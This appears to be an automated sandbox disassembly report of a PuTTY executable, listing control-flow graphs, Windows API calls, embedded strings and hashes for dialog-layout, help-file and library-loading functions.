                                                          control_flow_graph 2154 7ff738a563c0-7ff738a563c4 2155 7ff738a56d6b-7ff738a5751d call 7ff738a54750 SetDlgItemTextA call 7ff738a78cd0 2154->2155 2156 7ff738a563ca-7ff738a56467 call 7ff738a54a90 call 7ff738a57aa0 call 7ff738a54750 2154->2156 2169 7ff738a57523-7ff738a57573 call 7ff738a6f680 call 7ff738a70ca0 2155->2169 2170 7ff738a566f1-7ff738a566f9 call 7ff738a6f720 2155->2170 2168 7ff738a5646c-7ff738a566eb call 7ff738a6f720 * 2 2156->2168 2168->2169 2168->2170 2186 7ff738a5758e-7ff738a575a2 call 7ff738a70ca0 2169->2186 2187 7ff738a57575-7ff738a57589 call 7ff738afa0ec 2169->2187 2180 7ff738a57895-7ff738a578b6 2170->2180 2181 7ff738a578bc-7ff738a578be 2180->2181 2182 7ff738a55e80-7ff738a55e88 2180->2182 2181->2182 2185 7ff738a578c4-7ff738a578ec 2181->2185 2188 7ff738a55e8e-7ff738a55ea7 2182->2188 2189 7ff738a57904-7ff738a57914 2182->2189 2190 7ff738a578f0-7ff738a578fd 2185->2190 2216 7ff738a575bd-7ff738a575bf 2186->2216 2217 7ff738a575a4-7ff738a575b8 call 7ff738afa0ec 2186->2217 2187->2186 2194 7ff738a55ead-7ff738a55eb0 2188->2194 2195 7ff738a56110-7ff738a56115 2188->2195 2191 7ff738a5791e-7ff738a5792b 2189->2191 2192 7ff738a57916 2189->2192 2190->2190 2197 7ff738a578ff 2190->2197 2199 7ff738a57a19-7ff738a57a28 2191->2199 2200 7ff738a57931 2191->2200 2198 7ff738a57952-7ff738a5795c 2192->2198 2201 7ff738a55eb6-7ff738a55ec8 2194->2201 2202 7ff738a56180-7ff738a56231 2194->2202 2204 7ff738a56117-7ff738a5612b call 7ff738afa0ec 2195->2204 2205 7ff738a56130-7ff738a56143 2195->2205 2197->2182 2212 7ff738a579ed-7ff738a57a18 call 7ff738ae9230 2198->2212 2213 7ff738a57962-7ff738a57965 2198->2213 2209 7ff738a57a41-7ff738a57a46 2199->2209 2210 7ff738a57933-7ff738a57937 2200->2210 2214 7ff738a55eca-7ff738a55ede call 7ff738afa0ec 2201->2214 2215 7ff738a55ee3-7ff738a55ee8 2201->2215 2211 7ff738a5624d-7ff738a56251 2202->2211 2204->2205 2207 7ff738a56149-7ff738a5615e 2205->2207 2208 7ff738a5631a 2205->2208 2222 7ff738a56160-7ff738a56168 2207->2222 2223 7ff738a5631c-7ff738a56335 call 7ff738afa0ec 2208->2223 2224 7ff738a57a4d-7ff738a57a51 2209->2224 2225 7ff738a57a48-7ff738a57a4b 2209->2225 2226 7ff738a57939-7ff738a5794a 2210->2226 2227 7ff738a5794f 2210->2227 2228 7ff738a56253-7ff738a5625c 2211->2228 2229 7ff738a56240-7ff738a5624b 2211->2229 2213->2212 2230 7ff738a5796b-7ff738a579e4 call 7ff738a54750 2213->2230 2214->2215 2219 7ff738a55eee-7ff738a55efc 2215->2219 2220 7ff738a562e6-7ff738a562ed 2215->2220 2221 7ff738a575e7-7ff738a575ef 2216->2221 2217->2216 2236 7ff738a55efe-7ff738a55f12 call 7ff738afa0ec 2219->2236 2237 7ff738a55f17-7ff738a55f1a 2219->2237 2233 7ff738a562f3-7ff738a5630c 2220->2233 2234 7ff738a55e35 2220->2234 2238 7ff738a575dd-7ff738a575e5 2221->2238 2239 7ff738a575f1-7ff738a57606 call 7ff738affacc 2221->2239 2243 7ff738a5616e-7ff738a56175 2222->2243 2244 7ff738a56338-7ff738a5638f 2222->2244 2223->2244 2241 7ff738a57a53-7ff738a57a58 2224->2241 2242 7ff738a57a30-7ff738a57a3b 2224->2242 2225->2224 2226->2227 2245 7ff738a5794c 2226->2245 2227->2198 2228->2229 2229->2211 2246 7ff738a56260-7ff738a56265 2229->2246 2260 7ff738a579e9 2230->2260 2248 7ff738a56b14-7ff738a56b37 2233->2248 2249 7ff738a56312-7ff738a56315 2233->2249 2258 7ff738a55e3a-7ff738a55e7f 2234->2258 2236->2237 2252 7ff738a56075-7ff738a56077 2237->2252 2253 7ff738a55f20-7ff738a55f39 2237->2253 2238->2221 2251 7ff738a57630-7ff738a57643 2238->2251 2274 7ff738a57608-7ff738a57621 call 7ff738afa0ec 2239->2274 2275 7ff738a575d0-7ff738a575d8 2239->2275 2241->2242 2242->2209 2242->2210 2243->2222 2257 7ff738a56177 2243->2257 2256 7ff738a56394-7ff738a563a4 2244->2256 2245->2227 2246->2256 2259 7ff738a5626b-7ff738a5626e 2246->2259 2270 7ff738a56b40-7ff738a56bc1 2248->2270 2261 7ff738a56c1d-7ff738a56c3d 2249->2261 2251->2180 2267 7ff738a57649-7ff738a57654 2251->2267 2268 7ff738a5607d-7ff738a5609d 2252->2268 2269 7ff738a56a86-7ff738a56a91 2252->2269 2262 7ff738a56016-7ff738a56019 2253->2262 2263 7ff738a55f3f-7ff738a55f5d 2253->2263 2265 7ff738a57a5a-7ff738a57a79 call 7ff738afa0ec call 7ff738a37d20 2256->2265 2266 7ff738a563aa-7ff738a563b8 2256->2266 2257->2223 2258->2182 2271 7ff738a56289-7ff738a562e1 2259->2271 2272 7ff738a56270-7ff738a56284 call 7ff738afa0ec 2259->2272 2260->2212 2281 7ff738a56c40-7ff738a56c4f 2261->2281 2262->2252 2276 7ff738a5601b-7ff738a56037 2262->2276 2273 7ff738a55f60-7ff738a56010 2263->2273 2266->2269 2278 7ff738a5766d-7ff738a5768a call 7ff738a71980 2267->2278 2279 7ff738a560a0-7ff738a560fd 2268->2279 2269->2182 2270->2270 2280 7ff738a56bc7-7ff738a56c17 2270->2280 2271->2256 2272->2271 2273->2262 2273->2273 2274->2275 2275->2238 2284 7ff738a56040-7ff738a56073 2276->2284 2293 7ff738a5768c-7ff738a576a0 call 7ff738afa0ec 2278->2293 2294 7ff738a576a5-7ff738a576bc GetDlgItem 2278->2294 2279->2279 2286 7ff738a560ff-7ff738a56107 2279->2286 2280->2258 2280->2261 2281->2281 2288 7ff738a56c51 2281->2288 2284->2252 2284->2284 2286->2182 2288->2258 2293->2294 2296 7ff738a576be-7ff738a576d2 call 7ff738afa0ec 2294->2296 2297 7ff738a576d7-7ff738a576e7 2294->2297 2296->2297 2300 7ff738a576ed-7ff738a57702 2297->2300 2301 7ff738a57660-7ff738a57667 2297->2301 2300->2301 2301->2278 2302 7ff738a5771d-7ff738a5773a call 7ff738a71980 2301->2302 2305 7ff738a5773c-7ff738a57750 call 7ff738afa0ec 2302->2305 2306 7ff738a57755-7ff738a5776c GetDlgItem 2302->2306 2305->2306 2307 7ff738a5776e-7ff738a57782 call 7ff738afa0ec 2306->2307 2308 7ff738a57787-7ff738a57797 2306->2308 2307->2308 2312 7ff738a5779d-7ff738a577a2 2308->2312 2313 7ff738a57710-7ff738a57717 2308->2313 2312->2313 2314 7ff738a577a8-7ff738a577c1 2312->2314 2313->2302 2315 7ff738a57890 2313->2315 2314->2313 2316 7ff738a577c7-7ff738a577df 2314->2316 2315->2180 2317 7ff738a577fc-7ff738a5781a GetDlgItem 2316->2317 2319 7ff738a5781c-7ff738a5784e ScreenToClient 2317->2319 2320 7ff738a577f0-7ff738a577f6 2317->2320 2319->2320 2321 7ff738a57850-7ff738a57883 SetWindowPos 2319->2321 2320->2313 2320->2317 2321->2320
                                                          APIs
                                                          • SetDlgItemTextA.USER32 ref: 00007FF738A56DDC
                                                            • Part of subcall function 00007FF738A54A90: GetDC.USER32 ref: 00007FF738A54AC4
                                                            • Part of subcall function 00007FF738A54A90: SetMapMode.GDI32 ref: 00007FF738A54AFE
                                                            • Part of subcall function 00007FF738A54A90: MapDialogRect.USER32 ref: 00007FF738A54B38
                                                            • Part of subcall function 00007FF738A54A90: SendMessageA.USER32 ref: 00007FF738A54B54
                                                            • Part of subcall function 00007FF738A54A90: SelectObject.GDI32 ref: 00007FF738A54B60
                                                            • Part of subcall function 00007FF738A54A90: GetTextExtentExPointA.GDI32 ref: 00007FF738A54BB0
                                                            • Part of subcall function 00007FF738A54750: MapDialogRect.USER32 ref: 00007FF738A54770
                                                            • Part of subcall function 00007FF738A54750: CreateWindowExA.USER32 ref: 00007FF738A547DF
                                                            • Part of subcall function 00007FF738A54750: SendMessageA.USER32 ref: 00007FF738A547FA
                                                            • Part of subcall function 00007FF738A54750: SetWindowPos.USER32 ref: 00007FF738A54834
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DialogMessageRectSendTextWindow$CreateExtentItemModeObjectPointSelect
                                                          • String ID: !dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$EDIT$STATIC$ncols <= lenof(columns)$ret == c$thisc$win
                                                          • API String ID: 2829272046-217711369
                                                          • Opcode ID: e618d24459d988de02455c9c6bf2082abed2e598ebb5d6e6ebfa3467bdfa5aa0
                                                          • Instruction ID: a4d4df0dae8b7eb197e7a876f2e2a588935f84d39a528a3ed282855021015dfc
                                                          • Opcode Fuzzy Hash: e618d24459d988de02455c9c6bf2082abed2e598ebb5d6e6ebfa3467bdfa5aa0
                                                          • Instruction Fuzzy Hash: A812C3B3A096C696E720AB19E4417BAF360FB84784F844231DE8D43B94EF3EE584D754
                                                          Function 00007FF738A3D570 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 74libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2513 7ff738a3d570-7ff738a3d57c 2514 7ff738a3d57e-7ff738a3d583 2513->2514 2515 7ff738a3d584-7ff738a3d592 call 7ff738a72b00 2513->2515 2517 7ff738a3d597-7ff738a3d59d 2515->2517 2518 7ff738a3d59f-7ff738a3d5b9 GetProcAddress 2517->2518 2519 7ff738a3d5e6 2517->2519 2520 7ff738a3d5f1-7ff738a3d5f9 FreeLibrary 2518->2520 2521 7ff738a3d5bb-7ff738a3d5c2 2518->2521 2519->2520 2522 7ff738a3d600-7ff738a3d627 FindResourceA 2520->2522 2523 7ff738a3d5c8-7ff738a3d5d6 2521->2523 2524 7ff738a3d661 2521->2524 2522->2524 2525 7ff738a3d629-7ff738a3d639 SizeofResource 2522->2525 2523->2522 2527 7ff738a3d5d8-7ff738a3d5e2 2523->2527 2526 7ff738a3d668-7ff738a3d66b 2524->2526 2525->2524 2528 7ff738a3d63b-7ff738a3d64d LoadResource 2525->2528 2526->2514 2529 7ff738a3d671-7ff738a3d68a call 7ff738a73230 2526->2529 2527->2525 2530 7ff738a3d5e4 2527->2530 2528->2524 2531 7ff738a3d64f-7ff738a3d65f LockResource 2528->2531 2534 7ff738a3d68c-7ff738a3d6a5 call 7ff738a73230 2529->2534 2535 7ff738a3d6ab-7ff738a3d6b9 2529->2535 2530->2524 2531->2526 2534->2514 2534->2535 2535->2514
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: HtmlHelpA$Software\SimonTatham\PuTTY64\CHMPath$Software\SimonTatham\PuTTY\CHMPath$hhctrl.ocx
                                                          • API String ID: 190572456-509675872
                                                          • Opcode ID: 587ab05f2c0cdda8c7c30573f5bb13d947c44d7a9711b9a4aacebe547fce5185
                                                          • Instruction ID: e7eae3b4daa5bfd7c8e29ccabf76480bef9fb007759ed51c5acf9088251dcdb9
                                                          • Opcode Fuzzy Hash: 587ab05f2c0cdda8c7c30573f5bb13d947c44d7a9711b9a4aacebe547fce5185
                                                          • Instruction Fuzzy Hash: 00314FA2E0E743A1FA55B724E824B34E2916F15754FD44235C85D063D4DFBFA84CB23A
                                                          Function 00007FF738AA7F30 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: NameUser$AddressProc
                                                          • String ID: GetUserNameExA$secur32.dll$sspicli.dll
                                                          • API String ID: 9235790-676772081
                                                          • Opcode ID: 43787fd4701c189b76fb93f1a7ce50da9bfb4e153f5b92efbd84c6d7929e2dd1
                                                          • Instruction ID: 167c460b8bddb64bff2711fa073fd8c9bc8858a87b1b2c8caeca22c82e248022
                                                          • Opcode Fuzzy Hash: 43787fd4701c189b76fb93f1a7ce50da9bfb4e153f5b92efbd84c6d7929e2dd1
                                                          • Instruction Fuzzy Hash: 0E311623A0E112A6FA61B720D450B7AD390DF84B80FC48135D94E0BF84CE7EE906E769
                                                          Function 00007FF738A567ED Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 281windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend_set_error_mode
                                                          • String ID: !dp->shortcuts[s]$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$0$COMBOBOX$LISTBOX$STATIC$ret == c$ud
                                                          • API String ID: 3184551911-625819953
                                                          • Opcode ID: 64979b4be17955331d877ea59f8c46f0631de89c97ef96b58b2f2540d5c947d2
                                                          • Instruction ID: 77c444c2db2b9ed850763465a9015c9779b64ab63a53229fb2811c4da453d944
                                                          • Opcode Fuzzy Hash: 64979b4be17955331d877ea59f8c46f0631de89c97ef96b58b2f2540d5c947d2
                                                          • Instruction Fuzzy Hash: A9D1ADB36092C296E730DF05E440BAAF7A4FB88790F844235DA9947B99DF3ED144EB14
                                                          Function 00007FF738A54620 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: DrawInsert$InitCommonControls$LBItemFromPt$MakeDragList$comctl32.dll
                                                          • API String ID: 2238633743-1292723818
                                                          • Opcode ID: e2e23e6afa673d35b0ca70f87d541e277b31de276523b9c2df50b52eead36e3a
                                                          • Instruction ID: 0f7ddbd955abfa2ba1e5b80cdd4423c8581043834f39dc7c5ab07d2cc74231b9
                                                          • Opcode Fuzzy Hash: e2e23e6afa673d35b0ca70f87d541e277b31de276523b9c2df50b52eead36e3a
                                                          • Instruction Fuzzy Hash: 89F04F62A09A17B0E905BB11FD400A8F3E4EF457D0BC04332C80C03724EE7EA556E32A
                                                          Function 00007FF738A82380 Relevance: 13.6, APIs: 9, Instructions: 94windowregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Message$DialogWindow$ClassCreateCursorDestroyDispatchLoadLongParamPostQuitRegister
                                                          • String ID:
                                                          • API String ID: 4008243408-0
                                                          • Opcode ID: 3b8428cc546e1ae10ba25a1c1446a3a132c769dcc130d40ec6dc12fbc883bf59
                                                          • Instruction ID: 53a301e01cc202debe37a50872c81d9edb139c55688afd61f2d300eb616dcf13
                                                          • Opcode Fuzzy Hash: 3b8428cc546e1ae10ba25a1c1446a3a132c769dcc130d40ec6dc12fbc883bf59
                                                          • Instruction Fuzzy Hash: A5418C62A08BC295F760AB25F8107BAE7A0FB89780F804135DE8D43B64DF3ED449D725
                                                          Function 00007FF738A566FE Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 266windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2670 7ff738a566fe-7ff738a56741 call 7ff738a57aa0 2673 7ff738a56743-7ff738a5674e 2670->2673 2674 7ff738a56761-7ff738a567e2 call 7ff738a54750 call 7ff738a6f720 2670->2674 2673->2674 2675 7ff738a56750-7ff738a5675b SendMessageA 2673->2675 2680 7ff738a567e8 2674->2680 2681 7ff738a57523-7ff738a57573 call 7ff738a6f680 call 7ff738a70ca0 2674->2681 2675->2674 2680->2681 2683 7ff738a566f1-7ff738a566f9 call 7ff738a6f720 2680->2683 2692 7ff738a5758e-7ff738a575a2 call 7ff738a70ca0 2681->2692 2693 7ff738a57575-7ff738a57589 call 7ff738afa0ec 2681->2693 2689 7ff738a57895-7ff738a578b6 2683->2689 2690 7ff738a578bc-7ff738a578be 2689->2690 2691 7ff738a55e80-7ff738a55e88 2689->2691 2690->2691 2694 7ff738a578c4-7ff738a578ec 2690->2694 2695 7ff738a55e8e-7ff738a55ea7 2691->2695 2696 7ff738a57904-7ff738a57914 2691->2696 2711 7ff738a575bd-7ff738a575bf 2692->2711 2712 7ff738a575a4-7ff738a575b8 call 7ff738afa0ec 2692->2712 2693->2692 2699 7ff738a578f0-7ff738a578fd 2694->2699 2702 7ff738a55ead-7ff738a55eb0 2695->2702 2703 7ff738a56110-7ff738a56115 2695->2703 2700 7ff738a5791e-7ff738a5792b 2696->2700 2701 7ff738a57916 2696->2701 2699->2699 2705 7ff738a578ff 2699->2705 2707 7ff738a57a19-7ff738a57a28 2700->2707 2708 7ff738a57931 2700->2708 2706 7ff738a57952-7ff738a5795c 2701->2706 2709 7ff738a55eb6-7ff738a55ec8 2702->2709 2710 7ff738a56180-7ff738a56231 2702->2710 2713 7ff738a56117-7ff738a5612b call 7ff738afa0ec 2703->2713 2714 7ff738a56130-7ff738a56143 2703->2714 2705->2691 2722 7ff738a579ed-7ff738a57a18 call 7ff738ae9230 2706->2722 2723 7ff738a57962-7ff738a57965 2706->2723 2719 7ff738a57a41-7ff738a57a46 2707->2719 2720 7ff738a57933-7ff738a57937 2708->2720 2724 7ff738a55eca-7ff738a55ede call 7ff738afa0ec 2709->2724 2725 7ff738a55ee3-7ff738a55ee8 2709->2725 2721 7ff738a5624d-7ff738a56251 2710->2721 2716 7ff738a575e7-7ff738a575ef 2711->2716 2712->2711 2713->2714 2717 7ff738a56149-7ff738a5615e 2714->2717 2718 7ff738a5631a 2714->2718 2732 7ff738a575dd-7ff738a575e5 2716->2732 2733 7ff738a575f1-7ff738a57606 call 7ff738affacc 2716->2733 2730 7ff738a56160-7ff738a56168 2717->2730 2731 7ff738a5631c-7ff738a56335 call 7ff738afa0ec 2718->2731 2734 7ff738a57a4d-7ff738a57a51 2719->2734 2735 7ff738a57a48-7ff738a57a4b 2719->2735 2736 7ff738a57939-7ff738a5794a 2720->2736 2737 7ff738a5794f 2720->2737 2738 7ff738a56253-7ff738a5625c 2721->2738 2739 7ff738a56240-7ff738a5624b 2721->2739 2723->2722 2740 7ff738a5796b-7ff738a579e4 call 7ff738a54750 2723->2740 2724->2725 2728 7ff738a55eee-7ff738a55efc 2725->2728 2729 7ff738a562e6-7ff738a562ed 2725->2729 2745 7ff738a55efe-7ff738a55f12 call 7ff738afa0ec 2728->2745 2746 7ff738a55f17-7ff738a55f1a 2728->2746 2742 7ff738a562f3-7ff738a5630c 2729->2742 2743 7ff738a55e35 2729->2743 2752 7ff738a5616e-7ff738a56175 2730->2752 2753 7ff738a56338-7ff738a5638f 2730->2753 2731->2753 2732->2716 2747 7ff738a57630-7ff738a57643 2732->2747 2773 7ff738a57608-7ff738a57621 call 7ff738afa0ec 2733->2773 2774 7ff738a575d0-7ff738a575d8 2733->2774 2750 7ff738a57a53-7ff738a57a58 2734->2750 2751 7ff738a57a30-7ff738a57a3b 2734->2751 2735->2734 2736->2737 2754 7ff738a5794c 2736->2754 2737->2706 2738->2739 2739->2721 2755 7ff738a56260-7ff738a56265 2739->2755 2769 7ff738a579e9 2740->2769 2757 7ff738a56b14-7ff738a56b37 2742->2757 2758 7ff738a56312-7ff738a56315 2742->2758 2767 7ff738a55e3a-7ff738a55e7f 2743->2767 2745->2746 2760 7ff738a56075-7ff738a56077 2746->2760 2761 7ff738a55f20-7ff738a55f39 2746->2761 2747->2689 2765 7ff738a57649-7ff738a57654 2747->2765 2750->2751 2751->2719 2751->2720 2752->2730 2766 7ff738a56177 2752->2766 2764 7ff738a56394-7ff738a563a4 2753->2764 2754->2737 2755->2764 2768 7ff738a5626b-7ff738a5626e 2755->2768 2779 7ff738a56b40-7ff738a56bc1 2757->2779 2770 7ff738a56c1d-7ff738a56c3d 2758->2770 2777 7ff738a5607d-7ff738a5609d 2760->2777 2778 7ff738a56a86-7ff738a56a91 2760->2778 2771 7ff738a56016-7ff738a56019 2761->2771 2772 7ff738a55f3f-7ff738a55f5d 2761->2772 2775 7ff738a57a5a-7ff738a57a79 call 7ff738afa0ec call 7ff738a37d20 2764->2775 2776 7ff738a563aa-7ff738a563b8 2764->2776 2780 7ff738a5766d-7ff738a5768a call 7ff738a71980 2765->2780 2766->2731 2767->2691 2781 7ff738a56289-7ff738a562e1 2768->2781 2782 7ff738a56270-7ff738a56284 call 7ff738afa0ec 2768->2782 2769->2722 2790 7ff738a56c40-7ff738a56c4f 2770->2790 2771->2760 2784 7ff738a5601b-7ff738a56037 2771->2784 2783 7ff738a55f60-7ff738a56010 2772->2783 2773->2774 2774->2732 2776->2778 2787 7ff738a560a0-7ff738a560fd 2777->2787 2778->2691 2779->2779 2788 7ff738a56bc7-7ff738a56c17 2779->2788 2799 7ff738a5768c-7ff738a576a0 call 7ff738afa0ec 2780->2799 2800 7ff738a576a5-7ff738a576bc GetDlgItem 2780->2800 2781->2764 2782->2781 2783->2771 2783->2783 2792 7ff738a56040-7ff738a56073 2784->2792 2787->2787 2795 7ff738a560ff-7ff738a56107 2787->2795 2788->2767 2788->2770 2790->2790 2797 7ff738a56c51 2790->2797 2792->2760 2792->2792 2795->2691 2797->2767 2799->2800 2803 7ff738a576be-7ff738a576d2 call 7ff738afa0ec 2800->2803 2804 7ff738a576d7-7ff738a576e7 2800->2804 2803->2804 2807 7ff738a576ed-7ff738a57702 2804->2807 2808 7ff738a57660-7ff738a57667 2804->2808 2807->2808 2808->2780 2809 7ff738a5771d-7ff738a5773a call 7ff738a71980 2808->2809 2812 7ff738a5773c-7ff738a57750 call 7ff738afa0ec 2809->2812 2813 7ff738a57755-7ff738a5776c GetDlgItem 2809->2813 2812->2813 2814 7ff738a5776e-7ff738a57782 call 7ff738afa0ec 2813->2814 2815 7ff738a57787-7ff738a57797 2813->2815 2814->2815 2819 7ff738a5779d-7ff738a577a2 2815->2819 2820 7ff738a57710-7ff738a57717 2815->2820 2819->2820 2821 7ff738a577a8-7ff738a577c1 2819->2821 2820->2809 2822 7ff738a57890 2820->2822 2821->2820 2823 7ff738a577c7-7ff738a577df 2821->2823 2822->2689 2824 7ff738a577fc-7ff738a5781a GetDlgItem 2823->2824 2826 7ff738a5781c-7ff738a5784e ScreenToClient 2824->2826 2827 7ff738a577f0-7ff738a577f6 2824->2827 2826->2827 2828 7ff738a57850-7ff738a57883 SetWindowPos 2826->2828 2827->2820 2827->2824 2828->2827
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
